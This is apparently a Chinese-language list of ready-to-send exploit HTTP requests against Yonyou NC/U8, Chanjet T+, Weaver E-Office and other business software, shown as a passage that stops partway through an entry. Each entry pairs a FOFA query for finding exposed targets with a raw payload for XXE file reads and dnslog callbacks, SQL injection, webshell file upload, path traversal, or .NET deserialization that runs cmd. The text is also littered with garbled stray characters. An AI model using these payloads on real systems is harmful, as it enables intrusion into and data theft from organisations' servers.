POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1* U3 v6 f! \1 b
Host: 203.25.218.166:8888
) |6 S0 M: R) qUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info6 D( s7 L" N) ^; @
Accept-Encoding: gzip, deflate
$ @( N* `. | \) w2 K5 {% XAccept: */*( K4 ~0 l' J) {+ B/ @1 [6 {
Connection: close
; F: \- X/ G9 N6 m A8 Q! o; yaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
T# M+ G; A/ Z# V; AContent-Length: 190
6 P& \1 u5 s2 s% S, iContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0; ^+ k4 t& P" t/ Y! o# S
/ b$ b8 @& z, e) W--fd28cb44e829ed1c197ec3bc71748df08 h; {( \; M N1 L5 l8 {! f
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
+ h+ Y7 ~* l- y& ]
0 L3 |/ S3 X# _& U$ J4 L$ U<%out.println(1111*1111);%># l$ F+ V0 ]7 P( y. t) r0 k1 C7 N! M
--fd28cb44e829ed1c197ec3bc71748df0--# y. e1 j0 l" h2 X" e
, E9 x9 I' J/ x& J
" _6 E( |& Y9 c
36. 用友NC-Cloud soapFormat XXE
. Q* d, x! P$ @* a3 ]FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"4 J3 b; Y h$ V0 X8 O
POST /uapws/soapFormat.ajax HTTP/1.1
. @1 V' h$ O# oHost: 192.168.40.130:8989+ M: d' c4 C$ F* c* H8 `( H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0/ {$ J' `- P' _; ]
Content-Length: 263
6 A3 R! e' l, t" M1 O9 q/ Z. ^- T, SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% u" \/ z) P2 Y: j) U% L4 J; N; VAccept-Encoding: gzip, deflate: f, a7 N J$ N) B& F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! o$ s7 F+ n, S$ \8 }* i' f6 f$ Z
Connection: close
. H6 |7 K( u; B2 K( v7 y$ S7 MContent-Type: application/x-www-form-urlencoded
9 w0 e4 G1 }. B5 Y0 pUpgrade-Insecure-Requests: 1
% l. b- y/ \8 v# t9 R
: E2 ^/ Z$ G, }' k( j3 ]) pmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a7 e! o" n# i# z4 _1 a v2 W3 ?
* q2 Q- a4 |5 G! Z7 R( D* {# k
" A4 t! l# a- O( X37. 用友NC-Cloud IUpdateService XXE
! N. f, C9 [6 n6 s# x! r* pFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
3 p8 T4 c' @, UPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.13 M# y+ `8 Y' z* n: i q1 _
Host: 192.168.40.130:8989
- ?+ Z, d1 A& Y# {- g! u" I" YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36& ~2 q, T% D/ r# X" C' M& V T* L
Content-Length: 421
5 c3 _( k0 R+ ^' C& ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% Y! ~, V6 k0 {$ o/ b, M. y
Accept-Encoding: gzip, deflate7 ~6 d N9 i4 E
Accept-Language: zh-CN,zh;q=0.9
- ~% {+ I/ g" K0 W" \Connection: close, r5 Y- @9 o& |& ]- b( r
Content-Type: text/xml;charset=UTF-8
0 \3 L* T+ z: n Q# L" S# N8 KSOAPAction: urn:getResult- O t$ K. _ L" Q; ?$ ?
Upgrade-Insecure-Requests: 1
+ [2 V0 J5 }1 e
# p6 p+ G' k6 c7 B<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">% e/ J: v( x p/ V( q+ F2 z7 |
<soapenv:Header/>
& M6 Y- Z2 b8 b<soapenv:Body>
$ U6 B& b6 D2 \- [<iup:getResult>, M- F0 v( S2 O
<!--type: string-->
: @6 e" J8 D7 t t% H; H<iup:string><![CDATA[
) B; n$ g$ p: d: I& B5 O" p1 e<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>0 M2 ~8 e" L% G7 K5 D0 ~
<xxx/>]]></iup:string>3 q: c1 H: M/ ]' R7 `
</iup:getResult>
) _- ?& S+ c0 ?* S0 {/ V</soapenv:Body>6 Z. M5 f6 I0 v! {1 E4 o7 h
</soapenv:Envelope>
& y) C5 K/ J6 j7 t% Y# C5 h( f7 D+ w. A
F' q, v) {1 ^
& U& \0 R: P1 K5 |5 j* h1 p38. 用友U8 Cloud smartweb2.RPC.d XXE! e% s' R" _6 q$ u" f7 T
FOFA:app="用友-U8-Cloud"
; n& u1 Y4 q/ @1 c" T" ~! WPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.11 o. ~1 d0 j @; q
Host: 192.168.40.131:8088
2 F& r `3 }, H+ z/ e$ CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
5 i8 [0 I3 z: W" D* H3 q/ m: g& `Content-Length: 260
( }# R, a: Q/ V2 s/ Y. r0 c& v- MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3+ d* ~& B o& R5 K7 I( m
Accept-Encoding: gzip, deflate: w; ]7 p0 }1 z3 y* O& b
Accept-Language: zh-CN,zh;q=0.9) H8 ?1 y- d+ H. O
Connection: close
" o$ d! h: {6 b3 J' i1 vContent-Type: application/x-www-form-urlencoded, ^; D/ l$ q2 n
$ h$ ?! O0 F8 T: d
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>8 j/ j% M# i$ L2 A8 I% j
( @; U# G+ ^: L1 x1 ]% t! c
. z" K1 a0 s6 P" A, D. g) [4 i& Q39. 用友U8 Cloud RegisterServlet SQL注入5 M2 w( O/ V( b/ v6 A7 S$ e+ h
FOFA:title="u8c": m$ a6 g9 }1 S! d6 T) d+ I; Z
POST /servlet/RegisterServlet HTTP/1.17 _ K5 F) L* g1 e4 \1 J- B4 D3 c, a$ i4 p
Host: 192.168.86.128:80896 M, q- Y& v, `- G4 y0 U3 Z1 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36) c( D" a6 |, h
Connection: close; l4 U/ V& k ~) v, P9 u2 T: c, t
Content-Length: 85
. u, p- e/ A' P6 v; XAccept: */*
; w4 B& y8 E; F8 C7 yAccept-Language: en1 m' X, h! A4 \4 |, C. b5 A0 }6 N
Content-Type: application/x-www-form-urlencoded
; @. ?. {% j) p F9 C6 H9 R5 \X-Forwarded-For: 127.0.0.1
! P& D' {- Z" o4 x5 Y5 wAccept-Encoding: gzip. Z" f- \5 c+ {' h
7 k& e4 P. z7 k3 l, [: ^
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
$ \# v5 |7 s- @$ T/ u, e0 p2 j3 Q0 S Z! e1 O! z4 ?
+ X! h4 N0 D- D7 @7 d9 d, `0 [
40. 用友U8-Cloud XChangeServlet XXE3 y: b; f2 s5 X& q. b, w. G( I
FOFA:app="用友-U8-Cloud"
P" |2 D! R" j6 gPOST /service/XChangeServlet HTTP/1.1
( u& X. X/ ?8 D" v0 @# x. jHost: x.x.x.x+ G2 H! A9 ?4 N) y5 r
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: t6 e* R( u. @1 u7 |( U8 P0 T
Content-Type: text/xml
* Z- W. P {: k1 o, M, AConnection: close# u. O% i+ d: ]) r
/ e" O% t/ B4 n2 k: Y
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
2 z/ N" _5 a- [2 s0 B8 C
. F9 t/ c, ]" s# f% t1 _
5 i4 U( p, w' F" F5 m41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
: [. W0 Y- P2 f+ W- tFOFA:app="用友-U8-Cloud"8 Q9 Y B/ c. P) R5 M! Q# Q
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1- o/ W3 b, N0 K. ?+ s9 v# ]% R. u
Host:
# x. |5 R2 v# ^4 d" O5 l* w5 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( c$ G0 \: ~3 _1 V: aContent-Type: application/json3 a) C+ {- K- C; l1 s5 ~
Accept-Encoding: gzip
) ^2 A* b' J" L: l4 V9 g* y( OConnection: close
+ C) G3 j7 G( i) @7 u$ q/ x: ^8 k. ]) w. U( M3 p* O% U& t, |
7 Y& t! S2 x. K$ V/ S! K
42. 用友GRP-U8 SmartUpload01 文件上传; A0 C7 y2 s: P- r
FOFA:app="用友-GRP-U8"
( ~1 L" U% M) f m! nPOST /u8qx/SmartUpload01.jsp HTTP/1.1
% O; r, X% l$ O/ K5 v/ \Host: x.x.x.x
# o% L$ h s# nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
3 r% y) W9 N! [ ~% f: w4 i6 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36( {6 i6 k8 ~8 X- x
2 ]/ J7 m3 ^! yPAYLOAD# y$ K' ], X e+ x
+ ~7 ~- ^, t* u! z v
. p, j4 D) ^3 G. U D- N
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
+ M( d/ K8 @# U4 T% r. o8 o
; P$ Q) O) ~) N$ _$ n1 ]. R& N! g43. 用友GRP-U8 userInfoWeb SQL注入致RCE
* E+ [! a! Q; Q& j/ U. y7 oFOFA:app="用友-GRP-U8"
& J) x6 q# Y3 f5 V+ J' YPOST /services/userInfoWeb HTTP/1.1
1 y1 j6 s! A4 k7 CHost: your-ip! f$ v0 p, a+ C1 @: p* ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.362 \$ G/ @1 F5 u" d0 I9 w p' R* K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 w2 h$ a3 a) j3 N: |: j
Accept-Encoding: gzip, deflate
! M1 _! }4 u( _ s# eAccept-Language: zh-CN,zh;q=0.9
3 v, j1 o" b! AConnection: close
# v6 u# F t: kSOAPAction:: p$ ]& i+ X9 y" m& b
Content-Type: text/xml;charset=UTF-8. n- l+ C& t- I {1 L' q% _3 q
8 B/ S I& f1 O' Y6 Z<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
% n( N" Y4 @. e8 r3 |7 { <soapenv:Header/>5 D) V ~$ V6 W+ Z
<soapenv:Body>
H9 A' M, D! Q" j7 n" x <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
! ~! R" }" @7 o <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>, L2 u4 [8 j5 ] v E6 F7 ?, C
</ser:getUserNameById>; S$ H3 ^% T+ q, M( e- c
</soapenv:Body>% W* {6 X8 M% G1 |: v/ {( s! y
</soapenv:Envelope>9 A% \ J' V. o7 K5 q- p5 {% k: Z: O
, g, ]+ q9 J) Q' ^' x+ C4 ]; j7 u V& B' y* g/ I# }& v
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
7 b9 f# a5 ]/ b( V1 i* GFOFA:app="用友-GRP-U8"
3 x4 b8 W7 ~" Q7 OGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.18 p5 w" e' `* a8 e4 p3 t' \- V: X
Host: your-ip
; D# z! r& Q) `% {/ Q. ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' K0 y& ~0 ~) e0 X: ?! \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 W% L4 u. Y, ^$ q2 O; j/ fAccept-Encoding: gzip, deflate
2 O& u5 {% d3 p* N& T" v0 GAccept-Language: zh-CN,zh;q=0.9
$ m% z: e( |. @0 g; n4 dConnection: close
* L2 a9 L `% v
" G5 o$ e5 d# p! l
/ E0 m! ]9 _ S# P4 M45. 用友GRP-U8 ufgovbank XXE
d7 |7 \' _& w5 R* J1 SFOFA:app="用友-GRP-U8"4 R- x1 t! {- T7 r5 ]. q
POST /ufgovbank HTTP/1.1# L+ `+ b# W1 N
Host: 192.168.40.130:2228 u; |; h2 a4 r" w3 N2 V, N" H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0% X8 [* X! ^7 @5 |& e8 G
Connection: close/ Q$ T! o, c& [: i0 ~
Content-Length: 161
/ C2 c2 q5 ^ q8 I0 J6 s" ^9 @, pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 Q- O6 g. l1 V1 X3 c9 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. \. } l% Y% \" N3 {
Content-Type: application/x-www-form-urlencoded6 D/ ^9 W9 D' h2 S. F
Accept-Encoding: gzip
3 G8 A% q( {& s& c3 U4 u: b1 L3 k0 S- y+ y( o
reqData=<?xml version="1.0"?>
4 V. ^1 a) ^$ t$ S0 U# o' P, d! _<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest1 h9 F" a- b( z1 q
5 h2 ?' P V M/ ?8 ?% ^" o* ]. A8 @/ t6 F8 s' ~9 t2 ?2 L
46. 用友GRP-U8 sqcxIndex.jsp SQL注入1 z1 j3 V d$ X1 g9 [; x+ k
FOFA:app="用友-GRP-U8"
& l9 B$ E+ n+ [GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1# k, _6 ~ ^7 r/ U5 o% `$ R" q
Host: your-ip" q" d& b+ X2 J/ w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36% T; {# C; h5 e1 T) i. L2 }; X* U* h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, h/ b% ]; L/ d' w% W5 N* SAccept-Encoding: gzip, deflate. F! l. e# ]* x! z" i
Accept-Language: zh-CN,zh;q=0.98 m( C# p* D3 m2 w4 M5 A
Connection: close
7 ?* G) t# M) `6 Z2 E& h5 u& X; x7 e$ C. W# w0 @, W
4 z" [! v. Q" j47. 用友GRP A++Cloud 政府财务云 任意文件读取
- l$ j3 V# r# T3 wFOFA:body="/pf/portal/login/css/fonts/style.css"
+ k' T4 c/ ~, G S6 |( U5 f0 V/ v; g6 XGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1' U- i8 g# }7 X, t3 f1 X
Host: x.x.x.x2 U; q) {0 | O" R6 W# X/ h
Cache-Control: max-age=00 a9 m4 m( f3 \. h$ t0 B2 e5 a5 z
Upgrade-Insecure-Requests: 19 j7 t# }" b5 q( P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& K9 v8 a9 L2 t6 I+ ^3 b% z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 I# q5 {, R8 x2 v q' pAccept-Encoding: gzip, deflate, br" u8 i: U) _0 X* \( c- \3 R) P- J
Accept-Language: zh-CN,zh;q=0.9
5 `% o X0 s4 J+ G0 Q5 R0 pIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
: T3 C Z0 n7 j! w" z6 R9 HConnection: close# i& E1 K, T& O0 R
8 G; d. n1 Q* Z4 E
5 T& H5 V' K; G" F) ^& A1 n) ~( s' B1 |
48. 用友U8 CRM swfupload 任意文件上传! f5 m3 W2 R T, M% O- C
FOFA:title="用友U8CRM"
J0 K- _, \5 a' u& q( |POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1' u2 f) ~* l9 r/ G$ A
Host: your-ip; n7 B {+ s, L' |$ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% g3 \3 e* j( G' wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 o" v+ R* k4 b* j' XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, q. ?$ r" ^! p. _' {6 GAccept-Encoding: gzip, deflate
8 E9 I g% w' R( Z& {) _+ i( fContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
- a! |/ L8 D3 E) G5 a------269520967239406871642430066855
( x+ f; z* b% y2 wContent-Disposition: form-data; name="file"; filename="s.php"
: X" K- q3 F e1 f% E j1231
. x; c" L+ h! B, r2 C; ^0 l% rContent-Type: application/octet-stream$ ?' h" ~+ Z, q7 C8 c) x
------269520967239406871642430066855
. d( p; H x. S/ mContent-Disposition: form-data; name="upload"- Q$ q( d, }' a7 R. O- ^
upload
$ Z' d! C: U" t+ G5 o1 ?/ L( Z------269520967239406871642430066855--
5 ~' v) ?! h' H- |& T( q* b/ O* q* d2 F) ~) V
( K( ~- S; i0 Z% }* W49. 用友U8 CRM系统uploadfile.php接口任意文件上传
- \# s+ C" J* z6 aFOFA:body="用友U8CRM"
; i' ^6 ~& ?- E. t
# N3 F) ?" e8 A1 E; r3 O$ @POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
, P6 j: H+ k: z; L8 ?* ^& }# qHost: x.x.x.x
- F7 n( n; a- l9 K2 k4 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
[6 b: M3 d* @9 z4 jContent-Length: 329* U: `8 K. U2 m* X8 F" b5 V4 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 m4 C. C" Y4 c0 H- g3 O$ G
Accept-Encoding: gzip, deflate: Q" X% S" O9 D( n. ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# E; P" l3 W& g% _9 F* ^Connection: close
- k1 T: X$ u+ G2 OContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
# Y3 s: ?9 i9 E" ]* V8 E) c2 `% C- Z$ `6 o5 F% d
-----------------------------vvv3wdayqv3yppdxvn3w
, }7 r/ H. r9 P" B) GContent-Disposition: form-data; name="file"; filename="%s.php "
* O; s0 q* D6 y+ ^- z& n- |! k" X/ DContent-Type: application/octet-stream
% P8 C9 I# e9 m3 I- o/ E, a
/ ^- F, X' Z/ E- ], Q- k$ Dwersqqmlumloqa
& b8 O/ y" S; Z# G-----------------------------vvv3wdayqv3yppdxvn3w
* Z* }* C/ O. mContent-Disposition: form-data; name="upload"$ f @# i- _, X& _" Z
3 Z1 \; l; H ^# t2 Rupload
$ V2 b; ^$ O5 I, J' E-----------------------------vvv3wdayqv3yppdxvn3w--, x: W/ m4 x! |* k; M- H
v! e0 [4 w* R/ G `1 x( c8 |) Z
http://x.x.x.x/tmpfile/updB3CB.tmp.php: [: ^( F+ K, d" |! |/ T
0 h" A/ t9 }$ V( p- U8 X w
50. QDocs Smart School 6.4.1 filterRecords SQL注入 J- A9 e+ p0 m( N2 F4 q; d
FOFA:body="close closebtnmodal"8 B) z; L7 {: z9 f
POST /course/filterRecords/ HTTP/1.15 {; L" Q$ v/ V3 e/ s" k; B& n
Host: x.x.x.x; q0 [) S: @1 A- b
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 G5 ^9 Z: C* a1 Y+ {" O1 m1 F3 S
Connection: close' k1 N2 Z5 B3 S( \
Content-Length: 224
% ^( f! r8 {7 j! nAccept: */*
# S5 X' H$ ~. L; N1 vAccept-Language: en
+ y, t% B! p N$ j( i- bContent-Type: application/x-www-form-urlencoded5 Q" E& B* j# t; T4 ~! Q
Accept-Encoding: gzip
( ^/ w k6 o) r5 X
9 ]% E# H$ |# v [searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
5 y$ r2 e( \8 @1 A) Q1 m, W, m2 K! p0 k4 L) O6 C
0 J: E1 ^0 M& n! h51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入8 P+ N" ^0 I, Y z |7 i/ `
FOFA:app="云时空社会化商业ERP系统"
( g! _# s6 ?& g! L, h- { iGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.15 I6 G- h% l6 F
Host: your-ip$ T1 F, {" `% ^7 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
6 R+ `5 b( w4 Q6 _7 kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! x# M4 ?- m0 c5 [" NAccept-Encoding: gzip, deflate Q0 ^( D& j/ s$ x" J! j* R6 a! D( n
Accept-Language: zh-CN,zh;q=0.9
: e( r+ H1 ?5 z1 |9 ZConnection: close
/ h! V. ^' R. m! ` l& ~3 \; ?! k/ {* {. X% R
) Q c+ K: u/ Q3 o( B. S52. 泛微E-Office json_common.php sql注入
% w' G2 N& l, \. O: i3 qFOFA:app="泛微-EOffice"
7 w7 {7 Y# q" BPOST /building/json_common.php HTTP/1.1
( \5 h; |) P! V! pHost: 192.168.86.128:8097! G1 o N+ z9 d" d& m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 n, O7 F. ^: o8 Y% [Connection: close
, Y- V3 J G5 ]7 D' UContent-Length: 87
q! I. U7 ~$ NAccept: */*
* n* j4 ^* V/ @& UAccept-Language: en7 o/ Y/ ?4 K' |2 i u% r1 r( F
Content-Type: application/x-www-form-urlencoded7 r6 \' K; M( H- e1 p
Accept-Encoding: gzip$ d1 j$ K. B& F
4 ?0 T( ^5 J& o4 Z1 N- u, q c- N
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
* w9 D$ h. K$ H3 W0 p( }2 n9 T k. A! ]' ~& z! _
_; Q& l1 Y1 b# f53. 迪普 DPTech VPN Service 任意文件上传
9 L9 {9 h5 ]5 C# Q' H C% gFOFA:app="DPtech-SSLVPN"8 {- V1 C3 T% A0 [4 a9 C
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd { P6 I* ~2 Q
& Y8 u" l: r2 m8 ]; z
) H- E! ~( P0 l" C" t54. 畅捷通T+ getstorewarehousebystore 远程代码执行
- I* n) y* ^. {* o/ iFOFA:app="畅捷通-TPlus"- {) V& g' F" C' }8 B& M9 ^' f
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
8 M) R7 z* }6 h" x8 X"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
- t: K5 h* i% D3 I8 _
8 a9 d5 x& S+ K: H* h/ Y9 C7 M5 U% S1 u v4 Y0 t( G
完整数据包
+ X6 f; H2 V- B' W' P4 IPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.13 o! y+ @& d' K( D' R0 d1 i5 c5 F
Host: x.x.x.x
* ~1 a! p2 I3 x* E( w) _4 N7 oUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
& L; y, ^( J" V) O# E7 YContent-Length: 5930 g; `/ q$ ^" S- }7 r9 E9 r
; t9 A7 e$ R' J/ B{
* G& i3 j( t) f- e; E: I2 i"storeID":{" a1 h) E) N1 y6 c0 N) W5 {
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",& P/ }& D% ^2 j+ l4 E2 v
"MethodName":"Start",
+ L' H v. j, v' x% z o8 W( K E$ ^ "ObjectInstance":{% D$ s4 _! x3 y. `: w0 _
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 C5 w! T) U3 X, Y( Q# z4 i
"StartInfo":{
$ W9 F. N# w3 M9 I" S( n# s. B "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
& K' L$ J. o" y4 R; A3 Q5 e' m "FileName":"cmd",* z' y5 Z- }5 |+ b% p* w4 Y' A* W
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( S3 Y4 M8 K9 D: c7 J
}* D2 E4 b S4 F, F7 s: E
}
' \4 I) [4 x3 O+ t# ~0 M7 d }: E# {. H# \+ _* H! ~6 c( a2 y
}, o+ o/ Y7 g/ f, G5 t
+ [/ o7 k B9 Y' i9 E. }( H8 J# l( x( A
第二步,访问如下url
3 z6 u: g+ O8 ?) {; o v. C/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt6 P4 \2 R+ K$ R0 m, ` b0 h
% Z) b7 D" P( x+ s r' i
; |; H% H/ f+ s% q" G( X
55. 畅捷通T+ getdecallusers信息泄露! V; ]3 P9 O3 f
FOFA:app="畅捷通-TPlus"
/ V# J4 M9 F/ t) P; d/ N$ P第一步,通过) F7 K" S& h. o" s/ u( a+ c1 D1 C
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
3 x4 R( a% X& h! A M第二步,利用获取到的Cookie请求+ |) U+ G! |) @0 q
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers% v3 g8 H5 X. A# q7 a: n, s& d8 h
; w2 ?4 v& O+ x56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE: n9 ~( m# Q8 G5 v. F
FOFA: app="畅捷通-TPlus"0 p3 {# U+ Z$ ^3 \
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.12 h+ f" k. Q: Y) K' U; f! I
Host: x.x.x.x
